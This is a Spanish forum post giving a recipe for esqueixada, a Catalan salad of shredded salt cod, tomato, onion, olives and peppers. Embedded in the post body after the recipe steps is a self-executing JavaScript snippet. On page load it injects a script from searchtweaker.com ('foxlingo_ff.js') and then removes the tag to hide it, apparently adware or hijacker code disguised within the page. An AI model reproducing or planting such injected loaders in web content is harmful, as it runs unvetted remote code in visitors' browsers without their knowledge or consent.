Ajenos
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.

Esqueixada de bacalao

Ir abajo

chef Esqueixada de bacalao

Mensaje por Lilith Lun 24 Feb 2014, 12:57

[Tienes que estar registrado y conectado para ver esa imagen]


Introducción:


Este plato es típico en Cataluña


Ingredientes:


- 500 gr. de bacalao
- 4 tomates maduros
- 1 cebolla
- aceitunas negras
- 1 vaso de aceite de oliva
- pimienta negra
- 2 pimientos verdes estrechos
- perejil 


Instrucciones:


Desmenuzar el bacalao y ponerlo en remojo unos 30 min.
Cambiar el agua hasta que este en el punto de sazon.
Escurrirlo bien con las manos, colocarlo en una fuente y añadirle cebolla cortada en tiras finas y las aceitunas.
Pelar los tomates y cortarlos en trozos pequeños, los pimientos verdes en rodajas, añadir el bacalao.
Espolvorear con perejil picado, pimienta, aceite y conservar en frio 1 hora antes de comerlo.

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Lilith
Lilith
Ajen@


Volver arriba Ir abajo

Volver arriba

- Temas similares

 
Permisos de este foro:
No puedes responder a temas en este foro.